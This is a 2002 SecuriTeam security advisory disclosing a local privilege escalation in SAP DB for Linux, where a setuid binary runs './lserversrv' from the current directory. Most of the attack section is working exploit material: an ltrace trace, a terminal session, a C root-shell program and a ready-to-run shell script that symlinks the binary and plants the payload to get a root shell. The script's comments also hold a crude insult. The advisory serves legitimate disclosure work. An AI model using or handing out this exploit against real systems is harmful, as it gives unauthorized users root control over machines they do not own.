[UNIX] SAP Database Local Root via Symlink
From: support@securiteam.com
Date: 12/08/02
From: support@securiteam.com To: list@securiteam.com Date: 8 Dec 2002 23:15:31 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
SAP Database Local Root via Symlink
------------------------------------------------------------------------
SUMMARY
During an evaluation of the SAP database for Linux, KF located a security
issue in one of its setuid binaries. The issue is a symlink attack against a
binary that calls execv() on a file in the current working directory by
relative path. The details of this issue are outlined below.
DETAILS
Technical details:
This local attack on SAP DB is based on
sapdb-server-linux-32bit-i386-7_3_0_29.tgz; it is currently unknown whether
other SAP flavors are affected.
[elguapo@rh8 pgm]$ pwd
/usr/sapdb/depend/pgm
[elguapo@rh8 pgm]$ ls -al lserver
-rwsrwxr-x 1 root sapdb 15673 Oct 22 10:42 lserver
Using ltrace we can see an attempt to run ./lserversrv via execv():
[elguapo@rh8 pgm]$ ltrace ./lserver
__libc_start_main(0x08048800, 1, 0xbffff994, 0x08048690, 0x08048a0c
<unfinished ...>
__register_frame_info(0x0804a0b8, 0x0804a1bc, 0xbffff948, 0x080486b5,
0x4212a2d0) = 0
malloc(10) = 0x0804a200
strcpy(0x0804a200, "./lserver") = 0x0804a200
execv("./lserversrv", 0xbffff994 <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
The problem with this execv call is that lserver resolves "./lserversrv"
relative to the current working directory and does not check whether it is
reached through a symlink. An abuser can therefore very easily supply his own
lserversrv.
We are just going to make a directory in /tmp to use as scratch space:
[elguapo@rh8 pgm]$ cd /tmp
[elguapo@rh8 tmp]$ mkdir "snosoft+sapdb=root"
[elguapo@rh8 tmp]$ cd "snosoft+sapdb=root"
Next we make a symlink to the setuid binary lserver:
[elguapo@rh8 snosoft+sapdb=root]$ ln -s /usr/sapdb/depend/pgm/lserver lserver
As we saw above, lserver tries to do the following:
execv("./lserversrv", 0xbffff994 <unfinished ...>
This is easy enough to take advantage of...
[elguapo@rh8 snosoft+sapdb=root]$ cp /usr/bin/id lserversrv
As you can see, we have an effective uid of root at this point in time...
[elguapo@rh8 snosoft+sapdb=root]$ /tmp/snosoft+sapdb\=root/lserver
uid=500(elguapo) gid=500(elguapo) euid=0(root) groups=500(elguapo)
Finishing up the task is trivial from there...
[elguapo@rh8 snosoft+sapdb=root]$ cat > root.c
main(){
setuid(0);
setgid(0);
system("/bin/sh");
}
[elguapo@rh8 snosoft+sapdb=root]$ cc -o root root.c
[elguapo@rh8 snosoft+sapdb=root]$ cp root lserversrv
[elguapo@rh8 snosoft+sapdb=root]$ ./lserver
sh-2.05b# id
uid=0(root) gid=0(root) groups=500(elguapo)
Exploit:
# dotslash@snosoft.com
# sapdb-server-linux-32bit-i386-7_3_0_29.tgz exploit
# -rwsrwxr-x 1 root sapdb /usr/sapdb/depend/pgm/lserver
#
# This is an extremely lame script.
# If you can not do this by hand you are a retard.
#
# [elguapo@rh8 tmp]$ id
# uid=500(elguapo) gid=500(elguapo) groups=500(elguapo)
# [elguapo@rh8 tmp]$ ./lame.sh
# sh-2.05b# id
# uid=0(root) gid=0(root) groups=500(elguapo)
cd /tmp
mkdir "snosoft+sapdb=root"
cd "snosoft+sapdb=root"
ln -s /usr/sapdb/depend/pgm/lserver lserver
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > root.c
cc -o root root.c
cp root lserversrv
./lserver
Vendor response:
The alert from SAP is located here:
http://www.sapdb.org/sap_db_alert.htm
ADDITIONAL INFORMATION
The information has been provided by KF (dotslash@snosoft.com).
========================================
This bulletin is sent to members of the SecuriTeam mailing list.